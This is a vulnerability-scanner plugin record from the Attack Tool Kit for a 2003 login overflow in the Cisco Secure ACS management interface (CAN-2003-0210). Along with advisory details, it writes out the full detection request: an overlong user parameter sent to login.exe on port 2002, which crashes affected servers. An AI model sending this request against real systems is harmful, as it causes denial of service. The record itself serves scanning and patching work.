Cisco Secure ACS Management Interface Login Overflow 1.4
 
Plugin ID26
Plugin nameCisco Secure ACS Management Interface Login Overflow
Plugin filenameCisco Secure ACS Management Login Overflow.plugin
Plugin filesize3624 bytes
Plugin familyNetwork devices
Plugin created nameMarc Ruef
Plugin created emailmarc dot ruef at computec dot ch
Plugin created webhttp://www.computec.ch
Plugin created companycomputec.ch
Plugin created date2003/11/14
Plugin updated nameMarc Ruef
Plugin updated emailmarc dot ruef at computec dot ch
Plugin updated webhttp://www.computec.ch
Plugin updated companycomputec.ch
Plugin updated date2004/11/13
Plugin version1.4
Plugin changelogCorrected the plugin structure and added the accuracy values in 1.4
Plugin protocoltcp
Plugin port2002
Plugin procedure detectionopen|sleep|send GET /login.exe?user=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&reply=any&id=1 HTTP/1.0\n\n|sleep|close|open|sleep 5|close|pattern_exists Cisco
Plugin detection accuracy90
Plugin commentThis plugin was written with the ATK Attack Editor.
Bug advisoryhttp://www.securityfocus.com/archive/1/319576
Bug produced nameCisco Systems
Bug produced emailinfo at cisco dot com
Bug produced webhttp://www.cisco.com
Bug affectedCisco Secure ACS 2.1 to 3.11
Bug not affectedCisco Secure ACS newer than 3.11
Bug vulnerability classDenial Of Service
Bug descriptionThe Cisco Secure ACS Management Interface authenticates a user over a script named login.exe. In this the user sends the user name. If this parameter is more than 400 bytes long, the server causes to crash. You have to restart to work again.
Bug solutionUpgrade your Cisco firmware and filter incoming traffic on port tcp/80. As workaround (disabling the web service) you could add the rule set web disabled, write, reboot into your device.
Bug fixing time20 minutes
Bug exploit availabilityYes
Bug exploit urlhttp://www.securityfocus.com/bid/7413/exploit/
Bug remoteYes
Bug localNo
Bug severityHigh
Bug popularity8
Bug simplicity8
Bug impact8
Bug risk8
Bug Nessus riskHigh
Bug check toolsNessus is able to do the same check.
Source CVECAN-2003-0210
Source SecurityFocus BID7413
Source Nessus ID11556
Source LiteratureHacking Exposed: Network Security Secrets & Solutions, Stuart McClure, Joel Scambray and George Kurtz, February 25, 2003, 4th Edition, McGraw-Hill Osborne Media, ISBN 0072227427
Source Misc.http://www.securityfocus.com/archive/1/319483

This file was generated by the Attack Tool Kit (ATK), the open-sourced security scanner and exploiting framework.